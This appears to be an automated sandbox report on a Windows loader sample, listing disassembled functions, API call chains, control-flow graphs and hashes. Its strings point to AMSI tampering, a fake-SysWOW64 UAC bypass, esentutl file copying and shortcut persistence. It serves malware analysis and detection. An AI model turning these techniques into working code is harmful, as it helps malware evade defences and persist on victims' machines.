                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7143F935A8461DCBDB51EBA4DE809CF73FAEF89304F5040E1B209AB650DE34AE958F51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B13E12 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2804sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DD5E), ref: 02B0DCCB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B0DD05
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B0DD32
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B0DD3B
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,02B1BB30,00000000,00000000,02B1BB24,00000000,00000000), ref: 02B140CB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B088B8: LoadLibraryW.KERNEL32(amsi), ref: 02B088C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B088B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B08920
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,000003E8,ScanBuffer,02B77380,02B1B7B8,UacScan,02B77380), ref: 02B14277
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00004E20,UacScan,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacInitialize,02B77380,02B1B7B8), ref: 02B150EE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC04: RtlI.N(?,?,00000000,02B0DC7E), ref: 02B0DC2C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC42
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02B1041F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,UacInitialize), ref: 02AF7E67
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B085BC: WinExec.KERNEL32(?,?), ref: 02B08624
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2171786310-3926298568
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b9f10485aeb5fe7ba50affc4a5747a1994a11c35b695ce3f23f5b3dc9472e7b4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b57022d656f3e925f71da4c27dc59c3382916171ea0ed4a9f664b8d4600900cd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9f10485aeb5fe7ba50affc4a5747a1994a11c35b695ce3f23f5b3dc9472e7b4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B43FE35B8025D8FDB90EBA4DE80A9F73B6BF89304F5041E1A609A7650DF34AE85DF41
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0E678 Relevance: 25.1, APIs: 3, Strings: 11, Instructions: 562synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 10970 2b0e678-2b0e67c 10971 2b0e681-2b0e686 10970->10971 10971->10971 10972 2b0e688-2b0ec81 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4740 * 2 call 2af4860 call 2af4778 call 2af30d4 call 2af46d4 * 2 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4740 call 2af7f2c call 2af49a0 call 2af4d74 call 2af4df0 call 2af4740 call 2af49a0 call 2af4d74 call 2af4df0 call 2b08788 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c 10971->10972 11175 2b0eee2-2b0ef2f call 2af4500 call 2af4c60 call 2af4500 call 2af4c60 call 2af4500 10972->11175 11176 2b0ec87-2b0eedd call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 call 2af4860 call 2af49a0 call 2af46d4 call 2af47ec call 2af49a0 call 2af46d4 call 2b089d0 WaitForSingleObject CloseHandle * 2 call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c call 2af4860 call 2af49a0 call 2af47ec call 2af49a0 call 2b0894c * 3 10972->11176 11176->11175
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B08814
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02B77380,02B0EF4C,OpenSession,02B77380,02B0EF4C,UacScan,02B77380,02B0EF4C,ScanBuffer,02B77380,02B0EF4C,OpenSession,02B77380), ref: 02B0ED6E
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02B77380,02B0EF4C,OpenSession,02B77380,02B0EF4C,UacScan,02B77380,02B0EF4C,ScanBuffer,02B77380,02B0EF4C,OpenSession), ref: 02B0ED76
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000874,00000000,00000000,000000FF,ScanString,02B77380,02B0EF4C,OpenSession,02B77380,02B0EF4C,UacScan,02B77380,02B0EF4C,ScanBuffer,02B77380,02B0EF4C), ref: 02B0ED7F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: )"C:\Users\Public\Libraries\wdmvmswJ.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3475578485-2237372370
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c85a56bbdd6507552802ce97a260b07417cc81b3f02ef6dcefe69a110d8e2d1a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f1e15f56dd55d289570fab73b19d0323a30d9f3718895913bce6e9949b4467f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c85a56bbdd6507552802ce97a260b07417cc81b3f02ef6dcefe69a110d8e2d1a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B220C74B402599BEB91FBA4D9C1B8FB7B6AF89300F1044E1B604AB294DF34EE418F51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF1724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 13139 2af1724-2af1736 13140 2af173c-2af174c 13139->13140 13141 2af1968-2af196d 13139->13141 13142 2af174e-2af175b 13140->13142 13143 2af17a4-2af17ad 13140->13143 13144 2af1973-2af1984 13141->13144 13145 2af1a80-2af1a83 13141->13145 13148 2af175d-2af176a 13142->13148 13149 2af1774-2af1780 13142->13149 13143->13142 13152 2af17af-2af17bb 13143->13152 13150 2af1938-2af1945 13144->13150 13151 2af1986-2af19a2 13144->13151 13146 2af1a89-2af1a8b 13145->13146 13147 2af1684-2af16ad VirtualAlloc 13145->13147 13153 2af16df-2af16e5 13147->13153 13154 2af16af-2af16dc call 2af1644 13147->13154 13155 2af176c-2af1770 13148->13155 13156 2af1794-2af17a1 13148->13156 13158 2af1782-2af1790 13149->13158 13159 2af17f0-2af17f9 13149->13159 13150->13151 13157 2af1947-2af195b Sleep 13150->13157 13160 2af19a4-2af19ac 13151->13160 13161 2af19b0-2af19bf 13151->13161 13152->13142 13162 2af17bd-2af17c9 13152->13162 13154->13153 13157->13151 13169 2af195d-2af1964 Sleep 13157->13169 13167 2af182c-2af1836 13159->13167 13168 2af17fb-2af1808 13159->13168 13170 2af1a0c-2af1a22 13160->13170 13163 2af19d8-2af19e0 13161->13163 13164 2af19c1-2af19d5 13161->13164 13162->13142 13165 2af17cb-2af17de Sleep 13162->13165 13172 2af19fc-2af19fe call 2af15cc 13163->13172 13173 2af19e2-2af19fa 13163->13173 13164->13170 13165->13142 13171 2af17e4-2af17eb Sleep 13165->13171 13176 2af18a8-2af18b4 13167->13176 13177 2af1838-2af1863 13167->13177 13168->13167 13175 2af180a-2af181e Sleep 13168->13175 13169->13150 13178 2af1a3b-2af1a47 13170->13178 13179 2af1a24-2af1a32 13170->13179 13171->13143 13180 2af1a03-2af1a0b 13172->13180 13173->13180 13175->13167 13182 2af1820-2af1827 Sleep 13175->13182 13188 2af18dc-2af18eb call 2af15cc 13176->13188 13189 2af18b6-2af18c8 13176->13189 13183 2af187c-2af188a 13177->13183 13184 2af1865-2af1873 13177->13184 13186 2af1a49-2af1a5c 13178->13186 13187 2af1a68 13178->13187 13179->13178 13185 2af1a34 13179->13185 13182->13168 13194 2af188c-2af18a6 call 2af1500 13183->13194 13195 2af18f8 13183->13195 13184->13183 13193 2af1875 13184->13193 13185->13178 13196 2af1a5e-2af1a63 call 2af1500 13186->13196 13197 2af1a6d-2af1a7f 13186->13197 13187->13197 13198 2af18fd-2af1936 13188->13198 13202 2af18ed-2af18f7 13188->13202 13190 2af18cc-2af18da 13189->13190 13191 2af18ca 13189->13191 13190->13198 13191->13190 13193->13183 13194->13198 13195->13198 13196->13197
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,02AF1FC1), ref: 02AF17D0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,02AF1FC1), ref: 02AF17E6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8a6e85e7acb1869f595503c345bad16411120a73036de1e40fc985c793dab4c1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd6378b5257f0855337a8cc69c9ae6c0866f545375ff39e57fb5773f5a31c7dc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6e85e7acb1869f595503c345bad16411120a73036de1e40fc985c793dab4c1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AB14572A00341CFCB55CFA8D5C0355BBF1EB863A6F0986ADE64D8B385CB389555CB90
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B088B8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(amsi), ref: 02B088C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B08920
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DllGetClassObject$W$amsi
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 941070894-2671292670
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ebc68fb940cd62651c987ce05cac5594828e1c4d2c93d99b8c13ba257bdaff73
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c3b4530624b71c07e0d9db5453bd8f7681f2a2d71963cc5d7b291664537519a0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebc68fb940cd62651c987ce05cac5594828e1c4d2c93d99b8c13ba257bdaff73
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF0445054C381B9D302E2B48C89F4FFFCD4B62664F048A98B2E85A2D2DA79D1059B77
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF1A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 13227 2af1a8c-2af1a9b 13228 2af1b6c-2af1b6f 13227->13228 13229 2af1aa1-2af1aa5 13227->13229 13230 2af1c5c-2af1c60 13228->13230 13231 2af1b75-2af1b7f 13228->13231 13232 2af1b08-2af1b11 13229->13232 13233 2af1aa7-2af1aae 13229->13233 13239 2af16e8-2af170b call 2af1644 VirtualFree 13230->13239 13240 2af1c66-2af1c6b 13230->13240 13235 2af1b3c-2af1b49 13231->13235 13236 2af1b81-2af1b8d 13231->13236 13232->13233 13234 2af1b13-2af1b27 Sleep 13232->13234 13237 2af1adc-2af1ade 13233->13237 13238 2af1ab0-2af1abb 13233->13238 13234->13233 13241 2af1b2d-2af1b38 Sleep 13234->13241 13235->13236 13242 2af1b4b-2af1b5f Sleep 13235->13242 13244 2af1b8f-2af1b92 13236->13244 13245 2af1bc4-2af1bd2 13236->13245 13248 2af1af3 13237->13248 13249 2af1ae0-2af1af1 13237->13249 13246 2af1abd-2af1ac2 13238->13246 13247 2af1ac4-2af1ad9 13238->13247 13256 2af170d-2af1714 13239->13256 13257 2af1716 13239->13257 13241->13232 13242->13236 13253 2af1b61-2af1b68 Sleep 13242->13253 13251 2af1b96-2af1b9a 13244->13251 13245->13251 13252 2af1bd4-2af1bd9 call 2af14c0 13245->13252 13250 2af1af6-2af1b03 13248->13250 13249->13248 13249->13250 13250->13231 13258 2af1bdc-2af1be9 13251->13258 13259 2af1b9c-2af1ba2 13251->13259 13252->13251 13253->13235 13262 2af1719-2af1723 13256->13262 13257->13262 13258->13259 13261 2af1beb-2af1bf2 call 2af14c0 13258->13261 13263 2af1bf4-2af1bfe 13259->13263 13264 2af1ba4-2af1bc2 call 2af1500 13259->13264 13261->13259 13266 2af1c2c-2af1c59 call 2af1560 13263->13266 13267 2af1c00-2af1c28 VirtualFree 13263->13267
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,00000000,02AF1FE4), ref: 02AF1B17
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02AF1FE4), ref: 02AF1B31
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fb684122d7748ab03ff5bdfa4af55c9cc5766d02bbc60a000ccec170ff60d2bc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0956e4df939a1013199d1d5f7e3a8df3329f4d8487cb4a407afbdff30455b532
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb684122d7748ab03ff5bdfa4af55c9cc5766d02bbc60a000ccec170ff60d2bc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7351B071641240CFD795DFACC9C4756BBE0AB46329F1885AEE648CB282EB78C446CB91
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B0E5F6
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
